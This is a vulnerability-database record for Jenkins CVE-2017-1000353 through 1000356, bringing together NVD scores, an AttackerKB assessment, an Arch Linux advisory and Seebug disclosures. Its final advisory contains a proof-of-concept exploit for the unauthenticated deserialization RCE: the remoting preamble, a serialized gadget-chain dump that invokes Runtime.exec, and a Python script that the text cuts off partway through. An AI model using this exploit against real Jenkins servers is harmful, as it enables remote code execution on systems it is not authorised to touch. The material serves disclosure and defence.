{"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000354"], "modified": "2018-02-15T18:25:00", "cpe": ["cpe:/a:jenkins:jenkins:2.56", "cpe:/a:jenkins:jenkins:2.46.1"], "id": "CVE-2017-1000354", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000354", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:jenkins:jenkins:2.56:*:*:*:*:*:*:*", "cpe:2.3:a:jenkins:jenkins:2.46.1:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-02-02T06:36:31", "description": "Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an XStream: Java crash when trying to instantiate void/Void.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-01-29T17:29:00", "title": "CVE-2017-1000355", "type": "cve", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000355"], "modified": "2018-02-15T13:14:00", "cpe": ["cpe:/a:jenkins:jenkins:2.56", "cpe:/a:jenkins:jenkins:2.46.1"], "id": "CVE-2017-1000355", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000355", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:jenkins:jenkins:2.56:*:*:*:*:*:*:*", "cpe:2.3:a:jenkins:jenkins:2.46.1:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-02-02T06:36:31", "description": "Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an issue in the Jenkins user database authentication realm: create an account if signup is enabled; or create an account if the victim is an administrator, possibly deleting the existing default admin user in the process and allowing a wide variety of impacts.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-29T17:29:00", "title": "CVE-2017-1000356", "type": "cve", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000356"], "modified": "2018-02-15T13:15:00", "cpe": ["cpe:/a:jenkins:jenkins:2.56", "cpe:/a:jenkins:jenkins:2.46.1"], "id": "CVE-2017-1000356", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000356", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:jenkins:jenkins:2.56:*:*:*:*:*:*:*", "cpe:2.3:a:jenkins:jenkins:2.46.1:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-02-02T06:36:31", "description": "Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an unauthenticated remote code execution. An unauthenticated remote code execution vulnerability allowed attackers to transfer a serialized Java `SignedObject` object to the Jenkins CLI, that would be deserialized using a new `ObjectInputStream`, bypassing the existing blacklist-based protection mechanism. We're fixing this issue by adding `SignedObject` to the blacklist. We're also backporting the new HTTP CLI protocol from Jenkins 2.54 to LTS 2.46.2, and deprecating the remoting-based (i.e. Java serialization) CLI protocol, disabling it by default.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-29T17:29:00", "title": "CVE-2017-1000353", "type": "cve", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000353"], "modified": "2020-09-22T22:15:00", "cpe": ["cpe:/a:jenkins:jenkins:2.56", "cpe:/a:jenkins:jenkins:2.46.1"], "id": "CVE-2017-1000353", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000353", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:jenkins:jenkins:2.56:*:*:*:*:*:*:*", "cpe:2.3:a:jenkins:jenkins:2.46.1:*:*:*:lts:*:*:*"]}], "attackerkb": [{"lastseen": "2020-11-18T06:37:47", "bulletinFamily": "info", "cvelist": ["CVE-2017-1000353"], "description": "Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an unauthenticated remote code execution. An unauthenticated remote code execution vulnerability allowed attackers to transfer a serialized Java `SignedObject` object to the Jenkins CLI, that would be deserialized using a new `ObjectInputStream`, bypassing the existing blacklist-based protection mechanism. We\u2019re fixing this issue by adding `SignedObject` to the blacklist. We\u2019re also backporting the new HTTP CLI protocol from Jenkins 2.54 to LTS 2.46.2, and deprecating the remoting-based (i.e. Java serialization) CLI protocol, disabling it by default.\n\n \n**Recent assessments:** \n \n**space-r7** at September 11, 2020 5:56pm UTC reported:\n\nThe `readFrom` method within the `Command` class in the Jenkins CLI remoting component deserializes objects received from clients without first checking / sanitizing the data. Because of this, a malicious serialized object contained within a serialized `SignedObject` can be sent to the Jenkins endpoint to achieve code execution on the target.\n\nThis is a fairly old vulnerability, so it\u2019s _unlikely_ that there are many, if any vulnerable installations on the web today, but I rated this vulnerability based on what it _could_ give an attacker if they were to find a vulnerable installation online today. This vulnerability is yet another Java deserialization vulnerability that I would define as critical given a number of reasons:\n\n 1. Unauthenticated code execution \n\n 2. There is no special / proprietary protocol that will hinder exploitation ( you just send the object in the body of a POST request ) \n\n 3. A proof of concept exists and has for some time \n\n\nAgain, this is an unlikely target given the date of the vulnerability, but I think an attacker would definitely aim to exploit this if it was spotted online.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4\n", "modified": "2020-09-23T00:00:00", "published": "2018-01-29T00:00:00", "id": "AKB:5A79A3DC-D4D7-4FF8-BE45-A4E658714412", "href": "https://attackerkb.com/topics/V3oreaqint/cve-2017-1000353", "type": "attackerkb", "title": "CVE-2017-1000353", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2020-09-22T18:36:43", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000354", "CVE-2017-1000355", "CVE-2017-1000356"], "description": "Arch Linux Security Advisory ASA-201704-8\n=========================================\n\nSeverity: High\nDate : 2017-04-27\nCVE-ID : CVE-2017-1000354 CVE-2017-1000355 CVE-2017-1000356\nPackage : jenkins\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-255\n\nSummary\n=======\n\nThe package jenkins before version 2.57-1 is vulnerable to multiple\nissues including cross-site request forgery, privilege escalation and\narbitrary code execution.\n\nResolution\n==========\n\nUpgrade to 2.57-1.\n\n# pacman -Syu \"jenkins>=2.57-1\"\n\nThe problems have been fixed upstream in version 2.57.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2017-1000354 (privilege escalation)\n\nThe login command available in the remoting-based CLI stored the\nencrypted user name of the successfully authenticated user in a cache\nfile used to authenticate further commands. Users with sufficient\npermission to create secrets in Jenkins, and download their encrypted\nvalues (e.g. with Job/Configure permission), were able to impersonate\nany other Jenkins user on the same instance.\n\nThis has been fixed by storing the cached authentication as a hash-\nbased MAC with a key specific to the Jenkins instance and the CLI\nauthentication cache.\n\nPreviously cached authentications are invalidated when upgrading\nJenkins to a version containing a fix for this.\n\n- CVE-2017-1000355 (arbitrary code execution)\n\nJenkins uses the XStream library to serialize and deserialize XML. Its\nmaintainer recently published a security vulnerability that allows\nanyone able to provide XML to Jenkins for processing using XStream to\ncrash the Java process. In Jenkins this typically applies to users with\npermission to create or configure items (jobs), views, or agents.\n\nJenkins now prohibits the attempted deserialization of void / Void that\nresults in a crash.\n\n- CVE-2017-1000356 (cross-site request forgery)\n\nMultiple Cross-Site Request Forgery vulnerabilities in Jenkins allowed\nmalicious users to perform several administrative actions by tricking a\nvictim into opening a web page. The most notable ones:\n\nSECURITY-412: Restart Jenkins immediately, after all builds are\nfinished, or after all plugin installations and builds are finished\nSECURITY-412: Schedule a downgrade of Jenkins to a previously installed\nversion if Jenkins previously upgraded itself\nSECURITY-413: Install and (optionally) dynamically load any plugin\npresent on a configured update site\nSECURITY-414: Remove any update site from the Jenkins configuration\nSECURITY-415: Change a user\u2019s API token\nSECURITY-416: Submit system configuration\nSECURITY-417: Submit global security configuration\nSECURITY-418, SECURITY-420: For Jenkins user database authentication\nrealm: create an account if signup is enabled; or create an account if\nthe victim is an administrator, possibly deleting the existing default\nadmin user in the process\nSECURITY-419: Create a new agent, possibly executing arbitrary shell\ncommands on the master node by choosing the appropriate launch method\nSECURITY-420: Update the node monitor data on all agents\n\nImpact\n======\n\nA remote attacker can escalate privileges, execute arbitrary code or\nexecute cross-site request forgery which allows the attacker to perform\nseveral administrative actions.\n\nReferences\n==========\n\nhttps://jenkins.io/security/advisory/2017-04-26/\nhttp://seclists.org/oss-sec/2017/q2/132\nhttp://www.openwall.com/lists/oss-security/2017/04/03/4\nhttps://security.archlinux.org/CVE-2017-1000354\nhttps://security.archlinux.org/CVE-2017-1000355\nhttps://security.archlinux.org/CVE-2017-1000356", "modified": "2017-04-27T00:00:00", "published": "2017-04-27T00:00:00", "id": "ASA-201704-8", "href": "https://security.archlinux.org/ASA-201704-8", "type": "archlinux", "title": "[ASA-201704-8] jenkins: multiple issues", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T11:57:53", "description": "Multiple Cross-Site Request Forgery vulnerabilities in Jenkins allowed malicious users to perform several administrative actions by tricking a victim into opening a web page. The most notable ones:\r\n\r\n* SECURITY-412: Restart Jenkins immediately, after all builds are finished, or after all plugin installations and builds are finished\r\n\r\n* SECURITY-412: Schedule a downgrade of Jenkins to a previously installed version if Jenkins previously upgraded itself\r\n\r\n* SECURITY-413: Install and (optionally) dynamically load any plugin present on a configured update site\r\n\r\n* SECURITY-414: Remove any update site from the Jenkins configuration\r\n\r\n* SECURITY-415: Change a user\u2019s API token\r\n\r\n* SECURITY-416: Submit system configuration\r\n\r\n* SECURITY-417: Submit global security configuration\r\n\r\n* SECURITY-418, SECURITY-420: For Jenkins user database authentication realm: create an account if signup is enabled; or create an account if the victim is an administrator, possibly deleting the existing default _admin_ user in the process\r\n\r\n* SECURITY-419: Create a new agent, possibly executing arbitrary shell commands on the master node by choosing the appropriate launch method\r\n\r\n* SECURITY-420: Cancel a scheduled restart\r\n\r\n* SECURITY-420: Configure the global logging levels\r\n\r\n* SECURITY-420: Create a copy of an existing agent\r\n\r\n* SECURITY-420: Create copies of views in users' \"My Views\" or as children of the experimental \"Tree View\" feature\r\n\r\n* SECURITY-420: Enter \"quiet down\" mode in which no new builds are started\r\n\r\n* SECURITY-420: On Windows, after successful installation as a service, restart\r\n\r\n* SECURITY-420: On Windows, try to install Jenkins as a service\r\n\r\n* SECURITY-420: Set the descriptions of items (jobs), builds, and users\r\n\r\n* SECURITY-420: Submit global tools configuration (Jenkins 2.0 and up)\r\n\r\n* SECURITY-420: Toggle keeping a build forever (i.e. exclude or include it in log rotation)\r\n\r\n* SECURITY-420: Try to connect all disconnected agents simultaneously\r\n\r\n* SECURITY-420: Update the node monitor data on all agents\r\n\r\nThe above, as well as several other more minor issues, have all been fixed and these actions now require POST requests, and, if configured, a CSRF crumb, to work.", "published": "2017-04-28T00:00:00", "type": "seebug", "title": "Jenkins Multiple CSRF vulnerabilities (CVE-2017-1000356)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000356"], "modified": "2017-04-28T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93063", "id": "SSV:93063", "sourceData": "", "sourceHref": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-11-19T11:57:52", "description": "The login command available in the remoting-based CLI stored the encrypted user name of the successfully authenticated user in a cache file used to authenticate further commands. Users with sufficient permission to create secrets in Jenkins, and download their encrypted values (e.g. with Job/Configure permission), were able to impersonate any other Jenkins user on the same instance.\r\n\r\nThis has been fixed by storing the cached authentication as a hash-based MAC with a key specific to the Jenkins instance and the CLI authentication cache.\r\n\r\nPreviously cached authentications are invalidated when upgrading Jenkins to a version containing a fix for this.", "published": "2017-04-28T00:00:00", "type": "seebug", "title": "Jenkins CLI: Login command allowed impersonating any Jenkins user (CVE-2017-1000354)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000354"], "modified": "2017-04-28T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93064", "id": "SSV:93064", "sourceData": "", "sourceHref": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-11-19T11:57:52", "description": "#### **Vulnerability Summary**\r\n\r\nThe following advisory describes Java deserialization vulnerability found in CloudBees Jenkins version 2.32.1 that leads to a Remote Code Execution.\r\n\r\nJenkins helps to automate the non-human part of the whole software development process with now common things like continuous integration and by empowering teams to implement the technical aspects of continuous delivery. It is a server-based system running in a servlet container such as Apache Tomcat. It supports version control tools, including AccuRev, CVS, Subversion, Git, Mercurial, Perforce, Clearcase and RTC, and can execute Apache Ant, Apache Maven and sbt based projects as well as arbitrary shell scripts and Windows batch commands.\r\n\r\n**Credit**\r\nAn independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.\r\n\r\n**Vendor Response**\r\nCloudBees Jenkins has released patches to address this vulnerability and issued CVE-2017-1000353 for the vulnerability. For more details: [https://jenkins.io/security/advisory/2017-04-26](https://jenkins.io/security/advisory/2017-04-26)/\r\n\r\n\r\n#### **Vulnerability Details**\r\n\r\nJenkins is vulnerable to a Java deserialization vulnerability. In order to trigger the vulnerability two requests need to be sent.\r\n\r\nThe vulnerability can be found in the implementation of a bidirectional communication channel (over HTTP) which accepts commands.\r\n\r\nThe first request starts a session for the bi-directional channel and is used for \u201c_downloading_\u201d data from the server. The HTTP header \u201c_Session_\u201d is the identifier for the channel. The HTTP header \u201c_Side_\u201d specifies the \u201c_downloading/uploading_\u201d direction.\r\n\r\n\r\n\r\nThe second request is the sending component\u00a0of the bidirectional channel. The first requests is blocked until the second request is sent. The request for a bidirectional channel is matched by the \u201c_Session_\u201d HTTP header which is just a UUID.\r\n\r\n\r\n\r\nAll commands sent to the CLI start with a preamble which is often:\r\n\r\n```\r\n<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4=\r\n```\r\n\r\nThe preamble contains a base64 encoded serialized object. The serialized object of type \u201cCapability\u201d just tells the server which capabilities (e.g. HTTP\r\nchunked encoding) the client has.\r\n\r\nAfter the preamble and some additional bytes a serialized object of type Command is expected by the Jenkins server. Since Jenkins does not validate the serialized object, any serialize object can be sent.\r\n\r\nThe deserialization is code is in the method \u201creadFrom\u201d of class \u201cCommand\u201d:\r\n\r\n\r\nThe command is\u00a0called by the\u00a0\u201c_read()_\u201d of class \u201c_ClassicCommandTransport_\u201d.\r\n\r\n\r\n\r\nThe data coming \u201c_from_\u201d the \u201c_upload_\u201d-side of the channel is read in a thread of type ReaderThread.\r\n\r\n\r\n\r\nThe thread is triggered by the \u201c_upload_\u201d-method which is called in class \u201c_CliEndpointResponse_\u201d.\r\n\r\n\r\n\r\nIn that method the HTTP body data is read and the \u201cnotify\u201d method is called to notify the thread.\r\n\r\n\r\n\r\n**Proof of Concept**\r\n\r\nIn order to exploit the vulnerability, an attacker needs to create a serialized payload with\u00a0the command to execute by running the payload.jar script.\r\n\r\nThe second step is to change python script jenkins_poc1.py:\r\n\r\n* Adjust target url in URL variable\r\n* Change file to open in line \u201cFILE_SER = open(\u201cjenkins_poc1.ser\u201d, \u201crb\u201d).read()\u201d to your payload file.\r\n\r\nBy doing the previous steps, you should see the following massage in the log/stdout of jenkins:\r\n\r\n```\r\nJan 26, 2017 2:22:41 PM hudson.remoting.SynchronousCommandTransport$ReaderThread run\r\nSEVERE: I/O error in channel HTTP full-duplex channel a403c455-3b83-4890-b304-ec799bffe582\r\nhudson.remoting.DiagnosedStreamCorruptionException\r\nRead back: 0xac 0xed 0x00 0x05 'sr' 0x00 '/org.apache.commons.collections.map.ReferenceMap' 0x15 0x94 0xca 0x03 0x98 'I' 0x08 0xd7 0x03 0x00 0x00 'xpw' 0x11 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x01 0x00 '?@' 0x00 0x00 0x00 0x00 0x00 0x10 'sr' 0x00 '(java.util.concurrent.CopyOnWriteArraySetK' 0xbd 0xd0 0x92 0x90 0x15 'i' 0xd7 0x02 0x00 0x01 'L' 0x00 0x02 'alt' 0x00 '+Ljava/util/concurrent/CopyOnWriteArrayList;xpsr' 0x00 ')java.util.concurrent.CopyOnWriteArrayListx]' 0x9f 0xd5 'F' 0xab 0x90 0xc3 0x03 0x00 0x00 'xpw' 0x04 0x00 0x00 0x00 0x02 'sr' 0x00 '*java.util.concurrent.ConcurrentSkipListSet' 0xdd 0x98 'Py' 0xbd 0xcf 0xf1 '[' 0x02 0x00 0x01 'L' 0x00 0x01 'mt' 0x00 '-Ljava/util/concurrent/ConcurrentNavigableMap;xpsr' 0x00 '*java.util.concurrent.ConcurrentSkipListMap' 0x88 'Fu' 0xae 0x06 0x11 'F' 0xa7 0x03 0x00 0x01 'L' 0x00 0x0a\r\n'comparatort' 0x00 0x16 'Ljava/util/Comparator;xppsr' 0x00 0x1a 'java.security.SignedObject' 0x09 0xff 0xbd 'h*< ' 0xd5 0xff 0x02 0x00 0x03 '[' 0x00 0x07 'contentt' 0x00 0x02 '[B[' 0x00 0x09 'signatureq' 0x00 '~' 0x00 0x0e 'L' 0x00 0x0c 'thealgorithmt' 0x00 0x12 'Ljava/lang/String;xpur' 0x00 0x02 '[B' 0xac 0xf3 0x17 0xf8 0x06 0x08 'T' 0xe0 0x02 0x00 0x00 'xp' 0x00 0x00 0x05 0x01 0xac 0xed 0x00 0x05 'sr' 0x00 0x11 'java.util.HashSet' 0xba 'D' 0x85 0x95 0x96 0xb8 0xb7 '4' 0x03 0x00 0x00 'xpw' 0x0c 0x00 0x00 0x00 0x02 '?@' 0x00 0x00 0x00 0x00 0x00 0x01 'sr' 0x00 '4org.apache.commons.collections.keyvalue.TiedMapEntry' 0x8a 0xad 0xd2 0x9b '9' 0xc1 0x1f 0xdb 0x02 0x00 0x02 'L' 0x00 0x03 'keyt' 0x00 0x12 'Ljava/lang/Object;L' 0x00 0x03 'mapt' 0x00 0x0f 'Ljava/util/Map;xpt' 0x00 0x06 'randomsr' 0x00 '*org.apache.commons.collections.map.LazyMapn' 0xe5 0x94 0x82 0x9e 'y' 0x10 0x94 0x03 0x00 0x01 'L' 0x00 0x07 'factoryt' 0x00 ',Lorg/apache/commons/collections/Transformer;xpsr' 0x00 ':org.apache.commons.collections.functors.ChainedTransformer0' 0xc7 0x97 0xec '(z' 0x97 0x04 0x02 0x00 0x01 '[' 0x00 0x0d 'iTransformerst' 0x00 '-[Lorg/apache/commons/collections/Transformer;xpur' 0x00 '-[Lorg.apache.commons.collections.Transformer;' 0xbd 'V*' 0xf1 0xd8 '4' 0x18 0x99 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x05 'sr' 0x00 ';org.apache.commons.collections.functors.ConstantTransformerXv' 0x90 0x11 'A' 0x02 0xb1 0x94 0x02 0x00 0x01 'L' 0x00 0x09 'iConstantq' 0x00 '~' 0x00 0x03 'xpvr' 0x00 0x11 'java.lang.Runtime' 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 'xpsr' 0x00 ':org.apache.commons.collections.functors.InvokerTransformer' 0x87 0xe8 0xff 'k{|' 0xce '8' 0x02 0x00 0x03 '[' 0x00 0x05 'iArgst' 0x00 0x13 '[Ljava/lang/Object;L' 0x00 0x0b 'iMethodNamet' 0x00 0x12 'Ljava/lang/String;[' 0x00 0x0b 'iParamTypest' 0x00 0x12 '[Ljava/lang/Class;xpur' 0x00 0x13 '[Ljava.lang.Object;' 0x90 0xce 'X' 0x9f 0x10 's)l' 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x02 't' 0x00 0x0a\r\n'getRuntimeur' 0x00 0x12 '[Ljava.lang.Class;' 0xab 0x16 0xd7 0xae 0xcb 0xcd 'Z' 0x99 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x00 't' 0x00 0x09 'getMethoduq' 0x00 '~' 0x00 0x1b 0x00 0x00 0x00 0x02 'vr' 0x00 0x10 'java.lang.String' 0xa0 0xf0 0xa4 '8z;' 0xb3 'B' 0x02 0x00 0x00 'xpvq' 0x00 '~' 0x00 0x1b 'sq' 0x00 '~' 0x00 0x13 'uq' 0x00 '~' 0x00 0x18 0x00 0x00 0x00 0x02 'puq' 0x00 '~' 0x00 0x18 0x00 0x00 0x00 0x00 't' 0x00 0x06 'invokeuq' 0x00 '~' 0x00 0x1b 0x00 0x00 0x00 0x02 'vr' 0x00 0x10 'java.lang.Object' 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 'xpvq' 0x00 '~' 0x00 0x18 'sq' 0x00 '~' 0x00 0x13 'ur' 0x00 0x13 '[Ljava.lang.String;' 0xad 0xd2 'V' 0xe7 0xe9 0x1d '{G' 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x01 't' 0x00 0x05 'xtermt' 0x00 0x04 'execuq' 0x00 '~' 0x00 0x1b 0x00 0x00 0x00 0x01 'q' 0x00 '~' 0x00 ' sq' 0x00 '~' 0x00 0x0f 'sr' 0x00 0x11 'java.lang.Integer' 0x12 0xe2 0xa0 0xa4 0xf7 0x81 0x87 '8' 0x02 0x00 0x01 'I' 0x00 0x05 'valuexr' 0x00 0x10 'java.lang.Number' 0x86 0xac 0x95 0x1d 0x0b 0x94 0xe0 0x8b 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x01 'sr' 0x00 0x11 'java.util.HashMap' 0x05 0x07 0xda 0xc1 0xc3 0x16 '`' 0xd1 0x03 0x00 0x02 'F' 0x00 0x0a\r\n'loadFactorI' 0x00 0x09 'thresholdxp?@' 0x00 0x00 0x00 0x00 0x00 0x00 'w' 0x08 0x00 0x00 0x00 0x10 0x00 0x00 0x00 0x00 'xxxuq' 0x00 '~' 0x00 0x11 0x00 0x00 0x00 '/0-' 0x02 0x14 'I:aj' 0x01 0xfe 0xe7 'Kh' 0x98 '-' 0x9c 'o!' 0x05 'H' 0x84 0xfa 0xb1 0x82 0x02 0x15 0x00 0x90 0x0a\r\n0x92 0x0d 'x' 0xa2 '~~' 0xdd 0xba 0xa3 0xe8 0xf6 'x\\3' 0xcd 0x98 0x06 '*t' 0x00 0x03 'DSAsr' 0x00 0x11 'java.lang.Boolean' 0xcd ' r' 0x80 0xd5 0x9c 0xfa 0xee 0x02 0x00 0x01 'Z' 0x00 0x05 'valuexp' 0x01 'pxsr' 0x00 '1org.apache.commons.collections.set.ListOrderedSet' 0xfc 0xd3 0x9e 0xf6 0xfa 0x1c 0xed 'S' 0x02 0x00 0x01 'L' 0x00 0x08 'setOrdert' 0x00 0x10 'Ljava/util/List;xr' 0x00 'Corg.apache.commons.collections.set.AbstractSerializableSetDecorator' 0x11 0x0f 0xf4 'k' 0x96 0x17 0x0e 0x1b 0x03 0x00 0x00 'xpsr' 0x00 0x15 'net.sf.json.JSONArray]' 0x01 'To\\(r' 0xd2 0x02 0x00 0x02 'Z' 0x00 0x0e 'expandElementsL' 0x00 0x08 'elementsq' 0x00 '~' 0x00 0x18 'xr' 0x00 0x18 'net.sf.json.AbstractJSON' 0xe8 0x8a 0x13 0xf4 0xf6 0x9b '?' 0x82 0x02 0x00 0x00 'xp' 0x00 'sr' 0x00 0x13 'java.util.ArrayListx' 0x81 0xd2 0x1d 0x99 0xc7 'a' 0x9d 0x03 0x00 0x01 'I' 0x00 0x04 'sizexp' 0x00 0x00 0x00 0x01 'w' 0x04 0x00 0x00 0x00 0x01 't' 0x00 0x06 'randomxxsq' 0x00 '~' 0x00 0x1e 0x00 0x00 0x00 0x00 'w' 0x04 0x00 0x00 0x00 0x00 'xxq' 0x00 '~' 0x00 ' sq' 0x00 '~' 0x00 0x02 'sq' 0x00 '~' 0x00 0x05 'w' 0x04 0x00 0x00 0x00 0x02 'q' 0x00 '~' 0x00 0x1a 'q' 0x00 '~' 0x00 0x09 'xq' 0x00 '~' 0x00 ' px'\r\nRead ahead: \r\n\tat hudson.remoting.FlightRecorderInputStream.analyzeCrash(FlightRecorderInputStream.java:80)\r\n\tat hudson.remoting.ClassicCommandTransport.diagnoseStreamCorruption(ClassicCommandTransport.java:93)\r\n\tat hudson.remoting.ClassicCommandTransport.read(ClassicCommandTransport.java:75)\r\n\tat hudson.remoting.SynchronousCommandTransport$ReaderThread.run(SynchronousCommandTransport.java:59)\r\nCaused by: java.lang.ClassCastException: org.apache.commons.collections.map.ReferenceMap cannot be cast to hudson.remoting.Command\r\n\tat hudson.remoting.Command.readFrom(Command.java:96)\r\n\tat hudson.remoting.ClassicCommandTransport.read(ClassicCommandTransport.java:70)\r\n```\r\n\r\n**jenkins_poc1.py**\r\n\r\n```\r\nimport urllib\r\n\r\nimport requests\r\nimport uuid\r\nimport threading\r\nimport time\r\nimport gzip\r\nimport urllib3\r\nimport zlib\r\n\r\nproxies = {\r\n# 'http': 'http://127.0.0.1:8090',\r\n# 'https': 'http://127.0.0.1:8090',\r\n}\r\n\r\nURL='http://192.168.18.161:8080/cli'\r\n\r\nPREAMLE='<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4='\r\nPROTO = '\\x00\\x00\\x00\\x00'\r\n\r\n\r\nFILE_SER = open(\"jenkins_poc1.ser\", \"rb\").read()\r\n\r\ndef download(url, session):\r\n\r\n headers = {'Side' : 'download'}\r\n headers['Content-type'] = 'application/x-www-form-urlencoded'\r\n headers['Session'] = session\r\n headers['Transfer-Encoding'] = 'chunked'\r\n r = requests.post(url, data=null_payload(),headers=headers, proxies=proxies, stream=True)\r\n print r.text\r\n\r\n\r\ndef upload(url, session, data):\r\n\r\n headers = {'Side' : 'upload'}\r\n headers['Session'] = session\r\n headers['Content-type'] = 'application/octet-stream'\r\n headers['Accept-Encoding'] = None\r\n r = requests.post(url,data=data,headers=headers,proxies=proxies)\r\n\r\n\r\ndef upload_chunked(url,session, data):\r\n\r\n headers = {'Side' : 'upload'}\r\n headers['Session'] = session\r\n headers['Content-type'] = 'application/octet-stream'\r\n headers['Accept-Encoding']= None\r\n headers['Transfer-Encoding'] = 'chunked'\r\n headers['Cache-Control'] = 'no-cache'\r\n\r\n r = requests.post(url, headers=headers, data=create_payload_chunked(), 